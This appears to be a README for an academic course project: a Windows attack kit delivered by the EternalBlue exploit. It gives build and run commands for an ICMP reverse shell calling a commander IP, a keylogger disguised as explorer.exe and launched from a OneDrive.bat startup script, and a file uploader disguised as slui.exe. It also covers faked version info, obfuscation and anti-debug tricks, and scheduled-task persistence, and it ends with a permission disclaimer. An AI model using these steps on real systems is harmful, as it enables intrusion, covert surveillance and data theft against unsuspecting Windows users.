- Linux host (Ubuntu/Kali)
- Python 2.7
- Installer (python.org)
- Pip installer
impacket
: Runpython2 -m pip install impacket
- Python 2.7
- Windows 7 (for compiling implants)
- Python 3.4.4
- PyWin32 221
- pip==19.1.1
- APScheduler==3.3.0
- certifi==2018.11.29
- cffi==1.15.1
- chardet==3.0.4
- charset-normalizer==3.1.0
- cryptography==2.8
- future==0.18.3
- idna==2.7
- pycparser==2.21
- PyInstaller==3.2.1
- pyinstaller-hooks-contrib==2022.0
- pynput==1.6.8
- pytz==2023.3
- requests==2.20.1
- six==1.16.0
- tzdata==2023.3
- tzlocal==2.1
- urllib3==1.24.3
- Visual C++ 2008 compiler.
- Visual Studio 2010 (do not use Express version)
- Visual C++ 10.0 with MFC
- Windows SDK 7.1
- Resource Hacker (for faking Version Info)
- Python 3.4.4
We prepare a C2 package that communicates through ICMP protocol.
To compile remote shell,
open Visual C++ 2008 32-bit Command Prompt, and type the
following. Remember to change MY_IP
to the IP of commander.
cl.exe icmpsh-s.patch.c /D"MY_IP=\"192.168.191.128\""
pyinstaller --additional-hooks-dir C:\Python34\Lib\site-packages\_pyinstaller_hooks_contrib\hooks\stdhooks --onefile --paths=C:\python34\lib\site-packages --windowed -i "C:\Windows\explorer.exe" fileNew.py
pyinstaller --additional-hooks-dir C:\Python34\Lib\site-packages\_pyinstaller_hooks_contrib\hooks\stdhooks --hidden-import=queue --onefile --paths=C:\python34\lib\site-packages -i "C:\Windows\System32\slui.exe" fileUploader.py
Then use Resource Hacker to clone Version Info.
See output/compiled.zip
for all Python compiled C2 payload.
icmpsh-s.patch.exe
(Remote shell plant)explorer_32.exe
(Keylogger)OneDrive.bat
(Keylogger bootstrap)sluii.exe
(File Uploader)icmpsh_m3.py
(Remote shell connect)eBlue.py
(EternalBlue exploit)mysmb.py
(Necessary for EternalBlue)
Inside folder, eBlue.py
is the exploit. Run
python2 eBlue.py 169.254.16.129
After running, the C2 package should now be stored inside the target system. Additionally, a scheduled task is made to execute C2 in the future.
Due to the protocol limitation, we need to connect using Linux system and run the following command to disable automatic ICMP reply.
sysctl -w net.ipv4.icmp_echo_ignore_all=1 >/dev/null
When the scheduled task run, in order to connect, execute on our host:
sudo python3 icmpsh_m3.py 169.254.16.130 169.254.16.129
This is executed on startup by OneDrive.bat
.
Record data is stored in %TMP%/Install.log
This can be executed by running
C:\WINDOWS\sluii.exe <file>
icmpsh-s.patch.c
andicmpsh-m3.py
is based on bdamele:icmpsheBlue.py
from Exploit-DB- Anti-debug techniques from Anti-Debug Tricks
- C obfuscation from scrt:avcleaner
- Resource Hacker
Do not use this on systems unless you have been given explicit permission. This is created for an academic course. We are not responsible for any consequences both legally and ethically that are caused by the software.